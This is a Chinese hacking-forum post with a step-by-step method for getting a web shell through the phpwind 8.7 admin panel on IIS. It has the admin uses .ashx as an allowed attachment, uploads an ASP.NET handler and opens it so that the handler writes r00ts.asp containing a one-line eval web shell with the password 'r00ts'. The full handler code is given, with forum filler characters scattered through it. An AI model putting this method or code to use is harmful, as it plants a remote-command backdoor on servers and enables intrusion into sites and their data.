找回密码
 立即注册
查看: 3121|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小% h: y9 M9 v& |# J; e
# e3 P/ T) e( ^+ \, Z
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx0 r& _, r: g- A# A6 U7 C# F

  F6 o* |' A) G) W8 m! `发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
; f# {. k* u9 ^# w1 J' E& J 5 Q2 L) K( S( g7 R5 Q! D4 \
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx) |2 Q' B, G$ r; Y0 v

8 d* f5 a+ ^: J) H打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
8 Z! _: D; A5 i' z1 W
! c2 P  h- s2 S! g) c  d3 s' ~下面是代码:6 a# K( i. ^6 ?7 x2 D! F
( c7 x2 k, p) O8 `& s3 V, _
<%@ WebHandler Language="C#"Class="Handler" %>
9 f: `/ l& v2 R$ i% i) T. b5 ?using System;
" m7 r& r( W! e9 V  P- [6 Yusing System.Web;# k0 u  B: I8 m0 T* y; o
using System.IO;
7 i4 \# T: x1 S. Tpublic class Handler : IHttpHandler {% D  i; @% m7 g( q4 g6 s8 H
public void ProcessRequest (HttpContext context) {
, x! P7 h0 M4 g( ocontext.Response.ContentType = "text/plain";( N  |6 X' a( z: h
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));% _# U" d3 a* j& X
file1.Write("<%eval request(\"r00ts\")%>");) b/ Z/ v! N: J0 t/ x; ~
file1.Flush();. z  K, p+ R" ?, R  Y' t
file1.Close();/ T5 Z% ]" o; n1 q
}; G0 I" x8 E# c. j" D1 W
public bool IsReusable {! T  ?3 A3 z3 `+ G( I
get {
( y0 Z/ J8 O1 _: V) Oreturn false;/ _, k; }# F! r4 F2 {0 j
}
% z' N( P8 L5 y4 u}
( ]8 {# `$ ?: l& y}9 u% J7 ~% w; I; P: e5 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表